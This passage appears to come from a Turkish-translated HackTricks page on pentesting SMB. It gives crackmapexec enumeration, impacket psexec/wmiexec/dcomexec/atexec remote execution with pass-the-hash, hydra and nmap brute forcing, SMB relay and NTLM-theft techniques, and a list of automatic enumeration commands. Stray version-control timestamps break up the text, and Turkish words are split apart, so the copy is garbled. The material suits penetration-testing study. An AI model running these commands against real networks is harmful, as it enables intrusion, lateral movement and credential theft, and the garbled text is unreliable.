crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --rid-brute #RID brute
2023-01-04 19:28:50 +00:00
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -H < HASH > #Pass -The-Hash
2020-07-15 15:43:14 +00:00
```
2022-10-04 23:18:19 +00:00
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Her iki seçenek de kurban makinede _\pipe\svcctl_ üzerinden SMB aracı lı ğı yla **yeni bir hizmet oluşturacak** ve bunu kullanarak **bir şeyi yürütecek** (**psexec** yürütülebilir bir dosyayı ADMIN$ paylaşı mı na **yükleyecek** ve **smbexec** **cmd.exe/powershell.exe'ye** işaret edecek ve argümanlara yükü --**dosyası z teknik--** ekleyecektir).\
Daha fazla bilgi için [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md )ve [**smbexec** ](../windows-hardening/ntlm/smbexec.md ).\
**Kali** üzerinde /usr/share/doc/python3-impacket/examples/ konumundadı r.
2020-07-15 15:43:14 +00:00
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]< targetName or address >
./psexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
2024-02-23 16:46:32 +00:00
**-k** parametresini kullanarak **NTLM** yerine **kerberos** ile kimlik doğrulaması yapabilirsiniz.
2020-07-15 15:43:14 +00:00
2022-10-04 23:18:19 +00:00
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
**Port 135** üzerinden DCOM aracı lı ğı yla disk dokunmadan veya yeni bir hizmet çalı ştı rmadan gizlice bir komut kabuğu yürütün.\
**Kali** üzerinde /usr/share/doc/python3-impacket/examples/ konumunda bulunmaktadı r.
2020-07-15 15:43:14 +00:00
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]< targetName or address > #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass -the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
2024-02-23 16:46:32 +00:00
**-k** parametresini kullanarak **NTLM** yerine **kerberos** ile kimlik doğrulaması yapabilirsiniz.
2020-07-15 15:43:14 +00:00
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]< targetName or address >
./dcomexec.py -hashes < LM:NT > administrator@10.10.10.103 #Pass -the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
2022-10-04 23:18:19 +00:00
### [AtExec](../windows-hardening/ntlm/atexec.md)
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Görev Zamanlayı cı sı aracı lı ğı yla komutları yürütün (_\pipe\atsvc_ kullanarak SMB üzerinden).\
**kali** üzerinde /usr/share/doc/python3-impacket/examples/ konumundadı r.
2020-07-15 15:43:14 +00:00
```bash
./atexec.py [[domain/]username[:password]@]< targetName or address > "command"
./atexec.py -hashes < LM:NT > administrator@10.10.10.175 "whoami"
```
2024-02-10 18:14:16 +00:00
## Impacket referansı
2020-07-15 15:43:14 +00:00
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ ](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ )
2024-02-10 18:14:16 +00:00
## **Kullanı cı kimlik bilgilerini kaba kuvvet ile deneme**
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
**Bu önerilmez, maksimum izin verilen deneme sayı sı nı aşarsanı z bir hesabı engelleyebilirsiniz**
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
2022-07-13 11:11:15 +00:00
ridenum.py < IP > 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
2020-07-15 15:43:14 +00:00
```
2024-02-23 16:46:32 +00:00
## SMB iletme saldı rı sı
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Bu saldı rı , **Dahili ağda SMB kimlik doğrulama oturumları nı yakalamak** için Responder aracı nı kullanı r ve bunları bir **hedef makineye iletir** . Kimlik doğrulama **oturumu başarı lı ysa** , sizi otomatik olarak bir **sistem kabuğuna** bı rakacaktı r.\
2024-02-10 18:14:16 +00:00
[**Bu saldı rı hakkı nda daha fazla bilgi burada.** ](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md )
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
## SMB-Tuzak
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Windows kütüphanesi URLMon.dll, bir sayfa SMB aracı lı ğı yla bazı içeriğe erişmeye çalı ştı ğı nda ana bilgisayara otomatik olarak kimlik doğrulamaya çalı şı r, örneğin: `img src="\\10.10.10.10\path\image.jpg"`
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Bu işlevlerle gerçekleşir:
2020-07-15 15:43:14 +00:00
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
2024-02-23 16:46:32 +00:00
Bazı tarayı cı lar ve araçlar (örneğin Skype) tarafı ndan kullanı lı r
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
![Kaynak: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html ](<../.gitbook/assets/image (93 ).png>)
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
### MitMf kullanarak SMBTuzak
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
![Kaynak: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html ](<../.gitbook/assets/image (94 ).png>)
2022-09-15 17:28:33 +00:00
2024-02-23 16:46:32 +00:00
## NTLM Çalma
2022-09-15 17:28:33 +00:00
2024-02-23 16:46:32 +00:00
SMB Tuzaklama ile benzer şekilde, hedef sisteme kötü amaçlı dosyalar yerleştirme (örneğin SMB aracı lı ğı yla) bir SMB kimlik doğrulama girişimine neden olabilir, böylece NetNTLMv2 hash'i Responder gibi bir araçla ele geçirilebilir. Hash daha sonra çevrimdı şı kı rı labilir veya bir [SMB iletme saldı rı sı nda ](pentesting-smb.md#smb-relay-attack ) kullanı labilir.
2022-09-15 17:28:33 +00:00
2024-02-23 16:46:32 +00:00
[Gör: ntlm\_theft ](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft )
2021-08-12 13:30:40 +00:00
2024-02-10 18:14:16 +00:00
## HackTricks Otomatik Komutları
2021-10-18 11:21:18 +00:00
```
2021-08-12 13:30:40 +00:00
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
2021-08-15 18:12:30 +00:00
Entry_1:
2024-02-10 18:14:16 +00:00
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘ NBT over IP’ , Port 445 is ‘ SMB over IP’ . SMB stands for ‘ Server Message Blocks’ . Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
2021-08-15 18:12:30 +00:00
Entry_2:
2024-02-10 18:14:16 +00:00
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
2021-08-15 18:12:30 +00:00
Entry_3:
2024-02-10 18:14:16 +00:00
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
2021-08-15 18:12:30 +00:00
Entry_4:
2024-02-10 18:14:16 +00:00
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
2021-09-25 16:33:43 +00:00
2021-09-13 15:41:00 +00:00
Entry_5:
2024-02-10 18:14:16 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
2021-10-27 17:21:12 +00:00
Entry_6:
2024-02-10 18:14:16 +00:00
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-23 16:46:32 +00:00
< summary > < strong > Sı fı rdan kahraman olmaya kadar AWS hacklemeyi öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-01-02 18:28:27 +00:00
2024-02-23 16:46:32 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
2024-02-23 16:46:32 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )'yi keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **Katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking püf noktaları nı zı paylaşı n, PR'lar göndererek** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na.
2022-04-28 16:01:33 +00:00
< / details >